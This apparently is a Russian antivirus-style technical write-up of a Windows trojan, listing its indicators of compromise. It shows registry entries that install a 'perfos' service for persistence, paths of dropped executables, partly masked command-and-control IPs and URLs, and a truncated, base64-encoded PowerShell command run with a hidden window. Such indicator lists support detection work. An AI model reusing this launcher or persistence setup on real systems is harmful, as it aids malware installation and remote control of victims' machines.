Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\perfos] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\perfos] 'ImagePath' = '"%WINDIR%\SysWOW64\msyuv\perfos.exe"'
- 'perfos' "%WINDIR%\SysWOW64\msyuv\perfos.exe"
- 'perfos' %WINDIR%\SysWOW64\msyuv\perfos.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGEAOQBpAGEANQA2AD0AKAAnAEYAJwArACcANwAnACsAKAAnAGIAcgBtACcAKwAnAGQANwAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAEUAUgBQAHIATwBGAEkAbABFAFwARABnAGcATQBPAD...
- %HOMEPATH%\dggmo91\pdnouoc\luwfh3_t.exe
- %WINDIR%\syswow64\msyuv\perfos.exe
- %HOMEPATH%\dggmo91\pdnouoc\luwfh3_t.exe в %WINDIR%\syswow64\msyuv\perfos.exe
- '82.#30.1.24':80
- '51.##.124.206':80
- http://qs##ide.com/img/1W/
- http://51.##.124.206/JoM8Eqn2kYU4l/0DxX9dGnUk/ZQCqo/0Xg0S49iLQ2xWThZtYl/Sba68Zdouoh5KrXarxJ/zClJYDm99K6oiq3/
- DNS ASK qs##ide.com
- '%HOMEPATH%\dggmo91\pdnouoc\luwfh3_t.exe'
- '%WINDIR%\syswow64\msyuv\perfos.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGEAOQBpAGEANQA2AD0AKAAnAEYAJwArACcANwAnACsAKAAnAGIAcgBtACcAKwAnAGQANwAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAEUAUgBQAHIATwBGAEkAbABFAFwARABnAGcATQBPAD...' (со скрытым окном)